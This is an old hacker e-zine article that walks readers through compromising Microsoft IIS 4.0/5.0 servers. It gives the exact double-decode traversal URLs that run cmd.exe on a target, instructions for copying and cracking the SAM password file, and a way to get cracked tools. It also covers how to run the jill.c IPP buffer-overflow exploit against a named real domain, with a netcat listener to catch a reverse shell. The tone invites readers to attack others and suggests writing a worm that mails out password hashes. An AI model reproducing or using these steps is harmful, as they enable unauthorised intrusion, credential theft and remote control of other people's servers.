IIS:- Hacking For The Retarded - Snafu
     :'######::'##:::::'##::::'###::::'########:
     '##... ##: ##:'##: ##:::'## ##:::... ##..::
      ##:::..:: ##: ##: ##::'##:. ##::::: ##::::
     . ######:: ##: ##: ##:'##:::. ##:::: ##::::
     :..... ##: ##: ##: ##: #########:::: ##::::
     '##::: ##: ##: ##: ##: ##.... ##:::: ##::::
     . ######::. ###. ###:: ##:::: ##:::: ##::::
     :......::::...::...:::..:::::..:::::..:::::
___  ___  ___  _____   ___   ___________ _   _  _____ 
|  \/  | / _ \|  __ \ / _ \ |___  /_   _| \ | ||  ___|
| .  . |/ /_\ \ |  \// /_\ \   / /  | | |  \| || |__  
| |\/| ||  _  | | __ |  _  |  / /   | | | . ` ||  __| 
| |  | || | | | |_\ \| | | |./ /____| |_| |\  || |___ 
\_|  |_/\_| |_/\____/\_| |_/\_____/\___/\_| \_/\____/ 

                                                      
 
  .'`-_-`',.`'-_ Issue 40 Article 11 _-'`,.'`-_-`',

(____________________________________________________)
|            IIS:- Hacking For The Retarded          |
(____________________________________________________)
                         Snafu
[x--------------------------------------------------x]
                              

This month Bill Gates and his merry team of incompetents
have bought joy into the hearts of lamers and script
kiddies everywhere, with two brand new administrator
compromising exploits. 

The first exploit was discovered by NSFOCUS and is really
quite clever it affects IIS4.0/5.0.
The problem is that when a CGI is run IIS decodes it twice.
First time it decodes the CGI filename will be to see if
its a executable. Then IIS will decode the CGI once again
to check the CGI parameters but mistakenly when the second
decode occurs it doesn't just decode the CGI parameters it
decodes the CGI filename AGAIN. which means we can sneak our
../../ around the IIS security filters :). we change our
../ to ..%255c because this after the initial decoding it
will be turned into ..%5c this will pass the security checks
but won't break you out of webroot, but because the filename
is accidently decoded one more time, ..%5c will be turned into
 ../ tada! 

Heres the actual exploit URL

http://TARGET/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

this will show you the contents of C:\ and will look something like this

 Directory of c:\

01/11/00  09:38a        <DIR>          Backup
08/27/97  04:09p        <DIR>          bat
02/08/00  06:33a        <DIR>          dpt
07/25/97  03:02p        <DIR>          ExecSoft
07/25/97  07:53p        <DIR>          InetPub
12/06/99  12:26p        <DIR>          malafont
03/21/98  12:41p        <DIR>          MSSQL
08/20/97  08:47a        <DIR>          NM
10/02/98  02:09p        <DIR>          Program Files
08/11/98  02:31p                 8,168 SMSSETUP.LOG
05/25/01  09:03a        <DIR>          TEMP
07/26/97  12:06p        <DIR>          W3MB
03/08/01  05:42p        <DIR>          webdocs
07/28/97  03:15p        <DIR>          webtrend
05/26/01  03:00a        <DIR>          WINNT
              15 File(s)          8,168 bytes
                            120,239,616 bytes free

if we want to download a file then we must do

http://TARGET/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\blah.txt

that will copy blah.txt to www.target.com/scripts/blah.txt where
you can download the file, but before you go out and

"http://TARGET/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\WINNT\REPAIR\SAM"

everything is sight you must know that can only run commands
f IUSER_machinename. Which is shit basically you can copy most
stuff that in Inetpub normally and most stuff on C:\ but if you
are really lucky you might be able to copy the SAM to your
webdirectory (1in20 chance I would say) once you got the SAM
then you can download l0phtcrack from
http://www.securitysoftwaretech.com and run SAM audit on it.
You are probarly gonna need to brute it for a couple of days
if you wanna get the Admin password. there are cracks available
for l0pht crack on dalnet if your trial period has expired, I
have no problems with cracking l0pht software as the are no longe
working for the underground :(. theres a couple of perl scripts
available here
http://www.packetstorm.securify.com/filedesc/sensedecode.html
, but I really don't see any use for them, this is pretty straight
forward through your browser. mind you I think you can scan IP
blocks with these.

The Second exploit for this month was discovered by eeye, which
means its lame as fuck and is blatantly obvious .Eeye are the biggest
bunch of pricks ever don't ever believe the shit you read about
them being supa 1337 uberhaX0rz. its all hype and bullshit. if
you need any proof of this then please visit
http://www.attrition.org/mirror/attrition/2000/12/15/www.eeye.com
this exploit has only been released to plug there new product
SecureIIS which is shit and buggy as fuck anyway
http://neworder.box.sk/showme.php3?id=4718. The exploit however is
noway near as cleaver as the previous one and therefore eeye need
not take any credit for it. Its a basic bufferoverflow on an ISAPI
extention on IIS5 running on Win2g .the offending overflow is based
in an extention for Internet Printer Protocal (IPP.) IPP is for
remote printing and shit over HTTP so all webservers running this
extention unpatched are vulnarable. Originally when Eeye released
the exploit the proof of concept code that was released with it
didn't comprimise anything infact it was just made a plug for the
SecureIIS software on the victims server 31337!!! but within days
people modified the shellcode to make it the exploit a little more
serious. The first one released was jill.c this is quite a nice
piece of code as it overflows the extention then the shellcode makes
the victim server connect to your terminal on the port you specify,
connecting to Netcat running on your machine thus creating a reverse
shell. you control the remote machine like you were. you can download
Netcat for windows from http://www.securitysoftwaretech.com, to get
netcat running, type this at your command prompt 'nc -l -p 80 -vv'
it should look like this

C:\WINDOWS>cd C:\netcat

C:\netcat>nc -l -p 80 -vv
listening on [any] 80 ...

you need to run jill it should look something like this 

with these parameters:
jill <victim host> <victim port> <attacker host> <attacker port>

it should look something like this:
./jill bnp.org.uk 80 213.20.34.89 80

ok you can download the C code for Jill variation of the exploit
written by dark spyrit from
http://www.packetstorm.securify.com/filedesc/jill.c.html
<dspyrit@beavuh.org> just compile and run it on your shell.

pretty straight forward stuff. once you got a command prompt you can
run shit as Local System security. that means you are the king of the
castle and can do almost anything. Its probarly not worth retrieving
the SAM cos once the admin realises they got hacked they will probarly
change all the passwd's on the system anyway. perhaps if you created a
worm to mail you the SAM on a certain date then you might be able to
work around it wouldn't be to hard to create something like that. or
you could simply steal the SAM straight away and use the admin account
to login and do your deeds instead of the exploit I dunno depends
whats best for the situation, infact they might not even have 21 or 23
open so you would be forced to use the exploit. Anyway its all common
sense at the end of the day.

there you go piece of piss hacking

Shoutz. NSFOCUS, dark spyrit, solidox, F_S, Phreakazoid, TheMalice,
^Nitr8^, Cheezy (for running through this for me), crypt, F3, Goblinz,
Juliet, DaSpikey1, MuNkAy, biohazard, rehack, odysseus, thedohboy,
WickedWolf, UnInViTeD, tikka, SWAP, lohap, DavieB, MoRSDeo.

and finally my idol, my god McHammer for giving me all the inspiration
and love needed to produce this file

Stop
.
.
.
.
.
.
.
.
.
.
Hammertime

[HammerOut]